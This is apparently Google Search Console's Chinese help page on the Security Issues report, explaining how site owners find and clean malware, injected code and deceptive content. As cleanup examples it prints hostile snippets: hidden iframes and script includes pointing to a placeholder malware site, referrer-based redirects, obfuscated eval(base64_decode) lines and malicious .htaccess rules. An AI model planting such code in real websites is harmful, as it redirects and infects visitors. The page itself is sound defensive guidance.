“安全问题”报告

如果 Google 评估确定您的网站已遭入侵或存在可能会危害访问者或其计算机的行为,则“安全问题”报告会显示 Google 的评估结果。有害行为的示例包括:发起网上诱骗攻击,或者在用户的计算机上安装恶意软件或垃圾软件。

如果受安全问题影响的网页或网站出现在搜索结果中,它们可能会带有警告标签;若用户尝试访问这些网页或网站,浏览器可能会显示插页式警告页面。

打开“安全问题”报告

 

什么是安全问题?

安全问题分为以下类别:

  • 被黑内容:被黑内容是指因您的网站存在安全漏洞而被黑客擅自(未经您许可)放到您网站上的所有内容。为了保护我们的用户,Google 会尽最大努力从搜索结果中滤除被黑内容。了解详情
  • 恶意软件和垃圾软件:是指企图危害设备或其用户的软件,它们会参与欺骗性操作或意外操作,或者对用户产生负面影响。了解详情
  • 社交工程:是指会诱使访问者执行某些危险操作的内容,例如诱使访问者透露机密信息或下载软件。了解详情

我的网站上是否存在安全问题?

如果您的网站上存在安全问题,您将会在报告顶部看到网站上所有安全问题的计数。

如果您的网站上没有任何安全问题,系统将会显示一个绿色对勾标记和相应消息。

可是我刚刚买下这个网站!

如果您最近购买了一个网站,并且该网站在您成为所有者之前就存在一些安全问题,请修正“安全问题”报告中列出的问题,然后在重新审核请求中告知我们您最近购买了该网站,并且该网站现已符合 Google 网站站长指南的规定。

哪些网页会受到影响?

您只需展开问题说明,即可查看受影响的示例网址列表。此列表未必完整,所列内容只是您网站上受所选问题影响的网页的示例。有时,您可能会遇到没有示例网址的安全问题;这并不意味着没有网页受到影响,只是因为我们由于某些原因无法生成示例。

问题详情会显示首次在您网站上检测到此问题时的日期,以及一段简要说明和一个供您详细了解此问题的链接。

修正问题

要修正您网站上的安全问题,请执行以下操作:

  1. 展开“安全问题”报告上的问题说明。
  2. 阅读问题说明,并访问“了解详情”链接以了解详细信息和问题修正步骤。(“了解详情”链接指向此页面上的下述说明。)
  3. 使用详情部分中提供的受影响网页示例进行问题排查并修正相关问题。此列表未必完整,所列内容只是您网站上受此问题影响的网页的示例。您可能会遇到没有示例网址的安全问题;这并不意味着没有网页受到影响,只是因为我们由于某些原因无法生成示例。
  4. 在整个网站范围内修正此问题。仅修正部分网页中的问题并不会让网站上的部分内容重新显示在搜索结果中。
  5. 如果报告列出了多个影响您网站的安全问题,请修正所有问题。
  6. 测试您的修正效果。
  7. 当您为所有网页修正了“安全问题”报告中列出的所有问题之后,在此报告中选择提交审核请求。在重新审核请求中,请说明您所做的修正。理想的请求要做到以下三个方面:
    • 准确阐释网站上存在的质量问题。
    • 描述您为修正问题所采取的措施。
    • 描述您在采取措施后所获得的结果。
  8. 重新审核可能会需要 1-2 周的时间才能完成。我们会通过电子邮件将进度情况告知您。您在发送请求后会收到审核确认邮件,以通知您我们正在进行审核;在我们对待处理请求做出最终决定之前,请勿重新提交请求。

重新审核需要多长时间才能完成?

至多需要 1-2 周的时间。我们会在收到请求后向您发送电子邮件通知,让您知道我们正在处理该您的请求。我们完成审核后,您还会收到一封电子邮件。

在我们对任何待处理请求做出最终决定之前,请勿重新提交请求。如果尚未修正问题便提交重新审核请求,则可能会导致下一项请求的处理周期延长,甚至可能会导致您的网站被标记为屡次违规网站

安全问题列表

下文列出了可能存在的安全问题以及与如何修正每个问题有关的信息。问题划分为错误 或警告

欺骗性网页

您的网站包含会诱使访问者执行某些危险操作的内容,例如诱使访问者透露机密信息或下载软件。Google 安全浏览功能会在网络用户访问经常展示欺骗性内容的网页之前发出警告,从而保护网络用户。

在下列任一情况下,相关网页都会被视为具有欺骗性:

  • 效仿可信实体(例如,您自己的设备/浏览器或网站本身)的行为或外观。
  • 企图诱使您做出一些您只会对可信实体做出的操作,例如透露密码、致电技术支持部门或下载软件。

此类欺骗性内容称为“社交工程”。详细了解社交工程查看欺骗性网页示例

修正问题

1. 确认问题

访问示例网页以查找欺骗性内容。您可以使用网址检查工具在移动设备视图和桌面设备视图中查看您的网站。

2. 修正网页

修正参与社交工程行为的所有网页。如果您认为安全浏览功能对某个网页的分类有误,请点击此处进行报告。

3. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

欺骗性嵌入式资源

您的网站包含欺骗性的广告或嵌入式资源,这些内容会诱使访问者执行某些危险操作,例如透露机密信息或下载垃圾软件。黑客可能会通过网页中内嵌的资源(例如图片、其他第三方组件或广告)植入欺骗性内容。Google 安全浏览功能会在网络用户访问经常展示欺骗性内容的网页之前发出警告,从而保护网络用户。

有时,此类内容会显示在托管网页上;在另一些情形下,托管网站虽然不会直接显示广告,但会通过弹出式窗口、背后弹出式窗口或其他类型的重定向将用户转到恶意网页。在所有情形下,此类嵌入式内容都违反了托管网页的相关政策。

此类欺骗性内容称为“社交工程”。详细了解社交工程查看欺骗性嵌入式资源示例

修正问题

1. 确认问题

访问示例网页以查找欺骗性内容。确认您网站的网页上没有任何欺骗性的广告、图片或其他嵌入式第三方资源。请注意,广告网络可能会轮播在您网站的网页上展示的广告。因此,您可能需要刷新几次网页,然后才能确定其中是否有任何社交工程广告。某些广告在移动设备和桌面设备上可能会以不同的方式展示。您可以使用网址检查工具在移动设备视图和桌面设备视图中查看您的网站。

2. 移除欺骗性的广告或资源

检查您的网站中包含的第三方资源。确保您网站的网页上没有任何欺骗性的广告、图片或其他嵌入式第三方资源。修正参与社交工程行为的所有网页。

3. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

恶意软件
您的网站已感染或托管了来自恶意黑客的恶意软件。恶意软件是指符合以下特征的所有软件或移动应用:蓄意危害计算机、移动设备、计算机/移动设备上运行的软件或计算机/移动设备用户。

1. 确定您能否修正此问题

要修正网站上的恶意软件问题,您不仅需要能够解读网站所用的代码,或许还需要熟知网站的网络服务器配置。如果您认为这超出了您的能力范围,请参阅组建支持团队了解如何寻求帮助。

2. 诊断并修正您的恶意软件问题

恶意软件有许多类型。请参阅以下部分,以尝试诊断您网站上存在的具体恶意软件类型并加以修正。请注意,您的网站可能会感染多种类型的恶意软件;请务必进行彻底的诊断和网站清理。

恶意软件类型:服务器配置

说明

黑客已入侵了您的网站,并且正在将访问者从您的正常网站重定向到黑客的恶意软件攻击性网站。黑客可能修改了您服务器的配置文件。服务器配置文件通常允许网站管理员为网站上的特定网页或目录指定网址重定向。例如,在 Apache 服务器上,配置文件即是 .htaccess 文件以及 httpd.conf。

修正问题

1. 确认问题

访问“安全问题”报告中显示的一些示例网址。

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

如果网页出现了“服务器配置”类型的感染,它所返回的响应可能会包含以下标头:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. 清理您网站上“服务器配置”类型的恶意软件

通过外壳/终端访问权限登录您的服务器(如果需要,您可以使网站处于离线状态),然后查看相关的服务器配置文件。您的网站上可能会有多个已被黑客入侵的服务器配置文件。请检查这些文件中是否有诸如重定向之类的垃圾指令(黑客可通过这类指令将您的网站配置为重定向到未知的恶意软件攻击性网站)。例如,在 .htaccess 文件中,您可能会看到如下所示的重定向:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

此外:

  • 请务必检查整个文件,以免黑客将其代码添加到很容易被忽略的文件末尾处。
  • 仔细查看是否存在 cron 任务,黑客创建此类任务是为了持续更新 .htaccess 文件。Cron 任务可能会被列在多个位置,包括 /etc/crontab(以及许多 /etc/cron* 目录)和 /var/spool/cron
  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。
恶意软件类型:SQL 注入

说明

黑客可能已入侵了您网站的数据库。例如,黑客可能已通过编程方式在数据库表的每条记录中插入了恶意代码;如果服务器加载的网页需要使用来自数据库的信息,恶意代码就会嵌入到此网页的内容中,并可能会危害网站访问者。

修正问题

1. 确认问题

在命令行中对受影响的网址运行一些查询,并检查这些网址会如何响应 SQL 攻击字词(例如“iframe”或“eval”)。

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

接下来,登录您的数据库服务器或者通过工具(例如 phpMyAdmin)查看您的数据库。如果您使用了 Wget 或者 cURL,请尝试通过 Wget 或者 cURL 弄清网页源代码中显示的破坏程度与实际的数据库条目之间的关联。例如,如果您注意到自己的网页包含危险的 iframe,可以执行 SQL 查询搜索 iframe 代码。例如:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

此外,您可能还需要查看服务器上的数据库日志和错误文件,看看是否存在异常活动,例如错误或对于一般用户来说看起来不太正常的 SQL 命令。

2. 清理您的网站

清理网站做好准备后,您既可逐个更新每条受感染的数据库记录,也可恢复为最近的已知数据库备份。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。
恶意软件类型:代码注入

说明

您网站上的网页已被修改为包含恶意代码,例如指向恶意软件攻击网站的 iframe。

修正问题

1. 确认问题

访问“安全问题”报告中列出的已感染网址。检查对恶意代码的响应的 HTML。

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

以下是恶意代码的一些示例:

  • 会加载恶意网站的 iframe:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • 会从攻击性网站调用脚本并运行这些脚本的 JavaScript 或其他脚本语言:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 会将浏览器重定向到攻击性网站的脚本:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • 试图躲避检测的迷惑性恶意代码:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • 旨在随机将有害代码写入其他无害脚本的共享对象文件:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

调查网站上可能存在的所有有害代码。搜索“iframe”等字词可能有助于找出 iframe 代码。其他实用的关键字还包括“script”、“eval”和“unescape”。例如,要在基于 Unix 的系统上搜索“iframe”对应的所有文件,请使用以下代码:

$grep -irn "iframe" ./ | less

2. 清理您的网站

清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可从各网页以及所有相关的脚本函数或文件中移除代码注入内容。如果您修改了服务器配置文件,则可能需要重新启动网络服务器才能使更改生效。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。
恶意软件类型:错误模板

说明

用于返回错误消息(如“404 未找到文件”)的模板被配置为传播恶意软件。利用这种方式,攻击者甚至可以通过您网站上不存在的网址发起攻击。

修正问题

1. 确认问题

请求您网站上不存在的或会引发另一类错误的网页,并检查相关响应以查看它是来自另一网站还是包含恶意软件。

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. 清理您的网站

登录您的网络服务器,然后在服务器配置文件中搜索错误网页指令。例如,Apache 网络服务器的错误模板可在 .htaccess 文件中进行声明。下面是一个 .htaccess 文件条目示例,它会从恶意网站检索 404 错误网页:

ErrorDocument 404 http://<malware-site>/index.html 

清理网站做好准备后,您既可将 .htaccess 文件替换为已知的正常备份文件,也可删除原有的 .htaccess 文件中的恶意 ErrorDocument 指令。此外,请务必清理实际错误文件(如果您的网站上有这些文件)。最后,请重启您的网络服务器以确保所有更改生效。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。
恶意软件类型:跨网站恶意软件

说明

相应网站会从某个已知包含恶意内容的网站加载内容。在 Chrome 中,浏览器会使用包含以下图形的插页式消息来发出警告:

cross-site malware warning

修正问题

  1. 通过转到“安全问题”报告中列出的一些示例网址来确认问题。如果是跨网站恶意软件问题,您应该会看到上面的图形。
  2. 浏览器警告会告诉您可疑内容的网域。移除对浏览器警告中列出的已标记网站的所有引用。
  3. 如果您发现自己网站上的某个网页在您不知情的情况下包含了来自某个已标记网站的内容,则表明问题更加严重,您的网站很可能已遭到入侵。无论是哪一种情况,Google 都建议采取针对被黑网站的帮助指南中提供的恢复方法来隔离您的网站、评估受破坏程度以及清理您的网站。
  4. 从您的网站中移除所有社交工程内容后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。
  5. 如果您早前故意添加了某个合法网站的内容,但该网站后来被标记了,并且您希望在该网站被清理干净后重新添加相应内容,则可以使用与该网站对应的 Google 安全浏览诊断页 (http://www.google.com/safebrowsing/diagnostic?site=www.example.com) 来监控其状态。合法网站的所有者通常很快就会清理他们的网站。
其他类型的恶意软件

还有许多其他类型的恶意软件可能会影响您的网站。若想了解更多有关如何诊断和修正其他被黑类型的提示,请参阅“网站开发基础”网站。待修正网站后,请务必提交审核请求。

3. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

被黑类型:代码注入

黑客已入侵您的网站,并在您的网页中注入了恶意代码。示例包括:在打开网页时会重定向到恶意网站或会在浏览器中运行加密货币开采软件。

1. 确定您能否修正此问题

请参阅组建支持团队以了解您可能需要执行哪些操作才能自行修正此问题,或者如何求助(如果您认为自己的综合技能无法修正此问题)。

2. 确认问题

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

黑客可能已将恶意代码直接注入您网站的 HTML 文件(例如通过添加 JavaScript 重定向)中或注入用于生成您网站内容的文件(例如 PHP 文件)中。

抓取报告中列出的受感染网页,然后检查相应回复。黑客可能会使用多种不同的手段将访问者从您的网站重定向到他们的网站;下面仅列出了其中一些手段:

  • 重定向:​
    • 标头重定向:黑客可能会通过修改您服务器的配置文件来重定向访问者。服务器配置文件通常允许网站管理员为网站上的特定网页或目录指定网址重定向。例如,在 Apache 服务器上,配置文件即是 .htaccess 文件以及 httpd.conf。
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript 重定向:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • 从另一网站加载的恶意 JavaScript:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 试图躲避检测的迷惑性恶意代码:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

在您的响应和网站中搜索可疑代码。实用的搜索字词包括“search”、“eval”、“base64_decode”和“unescape”。

3. 清理您的网站

清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可自行移除垃圾内容。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。

4. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

被黑类型:内容注入

黑客已将垃圾链接或文本添加到您网站的网页中。注入的内容可能包含医药术语或其他与网站内容无关的垃圾内容

通常,黑客会使用以下某一种方式修改您的网站:

  • 获取您服务器上某个不安全目录的访问权限。例如,您可能无意中为某个目录留下了开放权限。
  • 利用您网站上运行的软件(例如内容管理系统)中的漏洞。例如,您可能运行了版本较低且不安全的 Drupal、Joomla! 或 WordPress。
  • 入侵您在网站上使用的第三方插件,例如访问者计数器。

1. 确定您能否修正此问题

请参阅组建支持团队以了解您可能需要执行哪些操作才能自行修正此问题,或者如何求助(如果您认为自己的综合技能无法修正此问题)。

2. 确认问题

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

抓取您网站中的某些网页,然后在响应中搜索您未添加的可疑内容或链接。例如,您可以搜索诸如“viagra”或“earn money”之类的医药术语或垃圾内容字词。

3. 清理您的网站

清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可从各网页中移除垃圾内容和链接。请务必修正“安全问题”报告中显示的所有黑客入侵示例。另请在 Google 中执行“site:”搜索并搜索您网站上的源文件,以便搜索您网站上可能已被黑客入侵的其他网页。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。

4. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

被黑类型:网址注入

黑客在您的网站上创建了新网页,其中通常包含垃圾内容或链接。有时候,这些新网页包含的代码会执行一些您不希望执行的操作,例如将您的用户重定向到其他网站,或者让您的网络服务器参与针对其他网站的拒绝服务攻击。

1. 确定您能否修正此问题

请参阅组建支持团队以了解您可能需要执行哪些操作才能自行修正此问题,或者如何求助(如果您认为自己的综合技能无法修正此问题)。

2. 确认问题

不要使用浏览器直接查看您网站上的受感染网页。

由于恶意软件通常会利用浏览器漏洞进行传播,在浏览器中打开已感染恶意软件的网页可能会损坏您的计算机。此外,黑客可能会通过各种隐藏真实内容的手段来隐藏垃圾内容,以避免被网站所有者检测到。

您可以改用下面这两种方法在计算机上更安全地浏览内容:

  • 使用网址检查工具查看 Google 所看到的网页样貌。这种做法非常有用,因为很多黑客做出的修改都是只对 Google 机器可见。例如,他们可能会在您网站上添加一些指向他们网站且仅当由 Google 引荐时才会呈现的链接。
  • 在命令行中使用 cURLWget 来执行 HTTP 请求(例如抓取某个网页)。这些免费提供的工具有助于诊断重定向,并且能够确定引荐来源网址或用户代理信息。黑客往往只会攻击特定的用户代理或引荐来源网址,以避免被检测到,同时也是为了选择更合适的攻击目标;借助这些工具,您可以模仿攻击目标。如果您的请求没有引发垃圾内容行为,请尝试使用不同的引荐来源地址(例如来自大型网站的链接,或不同的搜索引擎)。例如,要在一台 Windows 机器上模仿用户点击 Google 搜索结果中指向 www.example.com/page.html 的链接,请按照下例所示使用 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

查询报告中列出的示例网址以查看它们是否处于有效状态。这些网页可能并非由您本人创建,因此您将需要移除网站中的相应网页,或清除自动生成这些网页的代码。了解如何在您的网站中查找并清理这些网页。

您还可执行“site:”搜索以查找并非由您创建的网页。

  • 对于小型网站,您可在 Google 搜索中搜索 [site:example.com],以查看我们已编入索引的网页列表以及是否存在任何并非由您创建的网页。
  • 对于大型网站,您可以使用更具体的查询,例如:
    • [site:example.com pharmacy] - 列出 example.com 中所有包含“pharmacy”一词的网页。可将此词替换为其他的常见垃圾内容术语。
    • [site:example.com/wp-admin/] - 列出您 WordPress 网站的网站管理员版块中的所有网页。

3. 清理您的网站

清理网站做好准备后,您既可将受影响的目录替换为最近的正常备份文件,也可移除垃圾网页以及被黑客用来创建这些网页的所有文件或函数。

此外:

  • 参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。

4. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

有害下载内容

您的网站向用户提供了被 Google 安全浏览认为是恶意软件或垃圾软件的下载内容。当用户访问您的网站时,Chrome 浏览器可能会显示警告。您必须从网站中移除这些下载内容才能使警告消失。

1. 评估问题

如果这些下载内容是您有意添加的,请将其从您的网站中移除,然后跳转到提交审核请求

如果您对网站上的下载内容毫不知情,则表明您的网站可能已被黑客入侵。您应修正被黑客入侵的网站,然后查找并移除相应下载内容。

2. 确定您能否修正此问题

请参阅组建支持团队以了解您可能需要执行哪些操作才能自行修正此问题,或者如何求助(如果您认为自己的综合技能无法修正此问题)。

3. 确认问题

查看您网站上的一些示例网页,以确认是否存在这些下载内容。

4. 清理您的网站

参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。为清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可自行移除垃圾内容。请使用防病毒软件扫描托管在您网站上的二进制文件和其他内容。防病毒软件能够发现多种类型的恶意软件和垃圾软件,但遗憾的是,并不能发现所有类型的恶意软件和垃圾软件。您可以使用防病毒程序(或整合型防病毒服务,例如 VirusTotal)扫描您的软件,看看其中存在哪些潜在问题。Google 安全浏览功能会根据自己的标准判定程序或二进制文件是否为垃圾软件或恶意软件。

5. 确认您的修正效果

确保您的网站符合垃圾软件政策

6. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

指向有害下载内容的链接

您的网站链接到了一些网站,而这些网站所提供的下载内容被 Google 安全浏览认为是恶意软件或垃圾软件。当用户访问您的网站时,Chrome 浏览器可能会显示警告。您必须移除指向有害网站的链接才能使警告消失。

1. 评估问题

如果这些链接是您有意添加的,请将其从您的网站中移除,然后跳转到提交审核请求

如果您对这些链接毫不知情,则表明您的网站可能已被黑客入侵。

2. 确定您能否修正此问题

如果您的网站已被入侵,请参阅组建支持团队以了解您可能需要执行哪些操作才能自行修正此问题,或者如何求助(如果您认为自己的综合技能无法修正此问题)。

3. 确认问题

 

查看您网站上的一些示例网页,以确认是否存在这些下载内容。在某些情况下,如果黑客认为您是网站所有者,则可能会隐藏这些链接,因此请尝试使用网址检查工具访问示例网址,或者使用另一帐号或计算机登录。

4. 清理您的网站

参阅“被黑网站”指南以了解针对您的网站的完整修正流程,包括清理步骤以及有关如何防止网站再次被黑的提示。为清理网站做好准备后,您既可将受影响的文件替换为最近的正常备份文件,也可自行移除垃圾内容。

5. 确认您的修正效果

确保您的网站符合垃圾软件政策

6. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

不明的移动网络结算

如果 Google 检测到您的网站未将移动网络使用费的相关信息充分告知用户,Chrome 便可能会在用户加载某个会产生费用的网页之前显示一条警告消息。

1. 确认问题

访问报告中列出的示例网址,以查看哪些网页存在不明的移动网络结算行为。点击此处即可查看移动网络结算指南

2. 修正问题

修正相应网页,以使其符合移动网络结算最佳做法

3. 提交审核请求

确认您网站上的问题已被修正后,请在“安全问题”报告中提交安全审核请求。整个审核过程可能需要几天到几周的时间才能完成。

异常下载内容

您的网站提供了 Google 安全浏览未曾见过的下载内容。Chrome 浏览器可能会警告用户,提醒他们该文件是异常的下载内容且可能不安全。如果 Google 安全浏览功能在进行验证后判定下载文件是安全的,那么这些警告会自动消失。请注意,系统未必总会针对此问题提供示例网址。

此问题不会阻止您的网页或网站显示在 Google 搜索结果中,但会在用户最初请求下载未知文件时在 Chrome 浏览器中显示警告。

1. 修正问题

